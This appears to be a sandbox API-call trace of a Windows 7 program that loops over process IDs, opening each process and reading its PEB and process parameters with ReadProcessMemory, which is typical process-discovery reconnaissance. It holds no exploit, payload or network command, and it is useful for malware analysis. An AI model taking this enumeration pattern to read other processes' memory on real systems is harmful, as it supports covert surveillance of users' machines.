[0411.783] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.783] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1d1ef0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0411.784] malloc (_Size=0x8a) returned 0x2e1a70
[0411.784] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1d2802, lpBuffer=0x2e1a70, nSize=0x88, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e1a70*, lpNumberOfBytesRead=0x0) returned 1
[0411.784] free (_Block=0x2e1a70)
[0411.785] CloseHandle (hObject=0x24c) returned 1
[0411.786] _ui64tow (_Value=0x728, _Buffer="1852", _Radix=10) returned="1832"
[0411.792] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1832") returned 4
[0411.794] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.794] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.821] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x728) returned 0x24c
[0411.821] GetLastError () returned 0x0
[0411.821] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0411.821] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.822] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0411.822] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x432a50, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.822] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4327e6, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0411.823] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0411.824] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0411.824] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.825] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x431f40, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0411.825] malloc (_Size=0xa4) returned 0x2c1680
[0411.825] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x432852, lpBuffer=0x2c1680, nSize=0xa2, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0411.825] free (_Block=0x2c1680)
[0411.826] CloseHandle (hObject=0x24c) returned 1
[0411.827] _ui64tow (_Value=0x978, _Buffer="1832", _Radix=10) returned="2424"
[0411.832] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2424") returned 4
[0411.833] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.833] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.856] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x978) returned 0x24c
[0411.856] GetLastError () returned 0x0
[0411.856] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0411.856] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.856] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0411.856] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4d2910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.856] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4d26ea, lpBuffer=0x12dd100, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0411.857] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0411.857] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0411.857] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.857] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4d1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0411.858] malloc (_Size=0x6e) returned 0x2c1680
[0411.858] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4d2750, lpBuffer=0x2c1680, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0411.858] free (_Block=0x2c1680)
[0411.858] CloseHandle (hObject=0x24c) returned 1
[0411.858] _ui64tow (_Value=0x980, _Buffer="2424", _Radix=10) returned="2432"
[0411.861] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2432") returned 4
[0411.862] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.862] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.884] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x980) returned 0x24c
[0411.884] GetLastError () returned 0x0
[0411.884] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0411.884] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.884] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0411.884] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.884] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c26fa, lpBuffer=0x12dd100, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0411.885] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0411.886] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0411.886] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.886] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0411.886] malloc (_Size=0x70) returned 0x2c1680
[0411.886] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c2762, lpBuffer=0x2c1680, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0411.887] free (_Block=0x2c1680)
[0411.887] CloseHandle (hObject=0x24c) returned 1
[0411.888] _ui64tow (_Value=0x988, _Buffer="2432", _Radix=10) returned="2440"
[0411.893] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2440") returned 4
[0411.894] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.894] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.915] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x988) returned 0x24c
[0411.915] GetLastError () returned 0x0
[0411.915] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0411.916] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.916] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0411.916] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x512970, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.916] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5126f0, lpBuffer=0x12dd100, nSize=0x82, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0411.917] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0411.917] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0411.917] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.918] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x511ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0411.918] malloc (_Size=0x8a) returned 0x2e1a70
[0411.918] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x512772, lpBuffer=0x2e1a70, nSize=0x88, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e1a70*, lpNumberOfBytesRead=0x0) returned 1
[0411.918] free (_Block=0x2e1a70)
[0411.918] CloseHandle (hObject=0x24c) returned 1
[0411.948] _ui64tow (_Value=0x990, _Buffer="2440", _Radix=10) returned="2448"
[0411.950] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2448") returned 4
[0411.951] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x22f, dwBuildNumber=0x0, dwPlatformId=0x128260, szCSDVersion="") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.951] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.976] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x990) returned 0x24c
[0411.976] GetLastError () returned 0x0
[0411.976] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0411.976] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.976] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0411.977] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x322930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.978] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3226e6, lpBuffer=0x12dd100, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0411.979] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0411.980] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0411.980] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.980] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x321ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0411.982] malloc (_Size=0x7a) returned 0x2e3a70
[0411.982] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x322758, lpBuffer=0x2e3a70, nSize=0x78, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e3a70*, lpNumberOfBytesRead=0x0) returned 1
[0411.982] free (_Block=0x2e3a70)
[0411.983] CloseHandle (hObject=0x24c) returned 1
[0411.983] _ui64tow (_Value=0x998, _Buffer="2448", _Radix=10) returned="2456"
[0412.129] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2456") returned 4
[0412.130] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.130] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.155] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x998) returned 0x24c
[0412.155] GetLastError () returned 0x0
[0412.155] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.155] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.155] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.156] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4e2960, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.156] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4e26e6, lpBuffer=0x12dd100, nSize=0x82, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.157] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.158] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.158] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.158] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4e1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.159] malloc (_Size=0x8a) returned 0x2e1b10
[0412.159] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4e2768, lpBuffer=0x2e1b10, nSize=0x88, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e1b10*, lpNumberOfBytesRead=0x0) returned 1
[0412.159] free (_Block=0x2e1b10)
[0412.160] CloseHandle (hObject=0x24c) returned 1
[0412.161] _ui64tow (_Value=0x9a0, _Buffer="2456", _Radix=10) returned="2464"
[0412.166] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2464") returned 4
[0412.168] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.168] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.199] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a0) returned 0x24c
[0412.199] GetLastError () returned 0x0
[0412.199] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.199] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.199] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.199] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xb28f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.200] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xb26e0, lpBuffer=0x12dd100, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.201] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.202] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.202] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.202] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xb1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.202] malloc (_Size=0x66) returned 0x2c0800
[0412.202] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xb273e, lpBuffer=0x2c0800, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0800*, lpNumberOfBytesRead=0x0) returned 1
[0412.203] free (_Block=0x2c0800)
[0412.203] CloseHandle (hObject=0x24c) returned 1
[0412.204] _ui64tow (_Value=0x9a8, _Buffer="2464", _Radix=10) returned="2472"
[0412.208] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2472") returned 4
[0412.210] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.210] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.231] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a8) returned 0x24c
[0412.232] GetLastError () returned 0x0
[0412.232] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.232] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.232] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.232] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b2970, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.232] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b26fc, lpBuffer=0x12dd100, nSize=0x80, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.233] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.234] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.234] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
